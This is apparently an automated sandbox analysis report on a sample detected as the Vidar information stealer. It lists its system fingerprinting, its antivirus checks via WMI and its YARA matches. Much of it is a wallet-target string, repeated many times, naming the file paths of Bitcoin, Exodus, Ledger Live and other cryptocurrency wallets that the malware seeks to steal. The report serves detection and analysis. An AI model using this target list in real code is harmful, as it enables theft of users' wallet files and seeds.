Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Queries volume information: C:\ProgramData\EHDHIDAEHC.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Code function: 0_2_003EA440 GetLocalTime,SystemTimeToFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,

0_2_003EA440

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Code function: 0_2_003DFAE0 GetProcessHeap,HeapAlloc,GetUserNameA,

0_2_003DFAE0

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Code function: 0_2_003DFBC0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

0_2_003DFBC0

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.00000000031BE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001393000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, type: SAMPLE
Source: Yara match	File source: 0.2.a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe.3d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.EHDHIDAEHC.exe.439a680.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.EHDHIDAEHC.exe.436ce50.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.EHDHIDAEHC.exe.3e931c0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.EHDHIDAEHC.exe.3ec09f0.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe.3d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.EHDHIDAEHC.exe.439a680.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.MSBuild.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.EHDHIDAEHC.exe.436ce50.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.EHDHIDAEHC.exe.3ec09f0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.EHDHIDAEHC.exe.3e931c0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2094707680.000000000436C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2094707680.0000000003EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2092269679.0000000002FC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1698830320.00000000003F0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2094707680.000000000439A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2173978549.00000000003F0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2343148482.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2094707680.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe PID: 6448, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: EHDHIDAEHC.exe PID: 5460, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 1596, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.00000000032FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.00000000032FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.00000000032FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.00000000032FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.00000000032FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.00000000032FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.00000000032FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.00000000032FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.00000000032FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda 